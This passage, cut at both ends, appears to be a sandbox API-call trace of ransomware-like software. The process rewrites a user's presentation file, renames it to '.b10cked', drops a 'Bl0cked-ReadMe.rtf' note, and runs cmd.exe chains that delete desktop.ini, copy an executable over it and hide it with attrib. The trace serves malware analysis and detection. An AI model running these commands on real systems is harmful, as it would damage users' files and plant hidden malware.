lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0229.695] SetFilePointer 
(in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0229.695] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.695] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14819 [0229.695] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.695] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0229.696] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.696] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14819 [0229.696] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.696] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.696] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xa40b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xa40b, lpOverlapped=0x0) returned 1 [0229.696] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.696] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xa40b, 
lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xa40b, lpOverlapped=0x0) returned 1 [0229.697] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-41995, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa40e [0229.697] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xa40b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xa40b, lpOverlapped=0x0) returned 1 [0229.697] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-41995, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa40e [0229.697] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xa40b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xa40b, lpOverlapped=0x0) returned 1 [0229.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iyDSdIsdd3hcv.pptx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0229.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iyDSdIsdd3hcv.pptx", cchWideChar=18, lpMultiByteStr=0x13286a4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iyDSdIsdd3hcv.pptx", lpUsedDefaultChar=0x0) returned 18 [0229.704] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x14819 [0229.704] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0229.705] CloseHandle (hObject=0x1b4) returned 1 [0229.706] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\iyDSdIsdd3hcv.pptx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT") returned 0x51 [0229.708] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\") returned 0x45 [0229.709] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9d8, dwThreadId=0x7d0)) returned 1 [0229.832] CloseHandle (hObject=0x120) returned 1 [0229.832] CloseHandle (hObject=0x1b4) returned 1 [0229.832] CharUpperBuffW (in: 
lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\", cchLength=0x6c | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\RIBQ701A98461 Y-C _\\") returned 0x6c [0229.832] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0229.832] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\RIBQ701A98461 Y-C _\\", cchCount1=108, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount2=88) returned 3 [0229.832] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\", cchLength=0x6c | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\RIBQ701A98461 Y-C _\\") returned 0x6c [0229.832] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.832] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\RIBQ701A98461 Y-C _\\", cchCount1=108, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0229.832] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0229.833] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > 
\"[TO_PATH]\"") returned 0x20 [0229.833] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0229.833] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\") returned 0x45 [0229.833] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0229.834] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0229.834] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xfcc, dwThreadId=0x9f0)) returned 1 [0229.839] CloseHandle (hObject=0x120) returned 1 [0229.839] CloseHandle (hObject=0x1b4) returned 1 [0229.839] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\ribq701a98461 y-c _\\bl0cked-readme.rtf")) returned 0xffffffff [0229.839] GetLastError () returned 0x2 [0229.839] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\ribq701a98461 y-c _\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0229.842] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\ribq701a98461 y-c _\\bl0cked-readme.rtf")) returned 0x20 [0229.842] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0229.842] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0229.842] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0229.842] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0229.842] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0229.843] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0229.843] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0229.843] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\") returned 0x45 [0229.843] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0229.843] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0229.844] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1") returned 0x44 [0229.844] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & del /f /q 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x1ce | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x1ce [0229.844] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0229.844] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, 
dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"", lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9bc, dwThreadId=0x9ac)) returned 1 [0229.859] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0233.410] CloseHandle (hObject=0x1b4) returned 1 [0233.410] CloseHandle (hObject=0x120) returned 1 [0233.410] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.410] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0233.410] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0233.410] GetTickCount () returned 0x402dd [0233.410] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=29019940287) returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 
lpWideCharStr="\x33\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x44\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x34\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 
lpWideCharStr="\x43\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6f\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 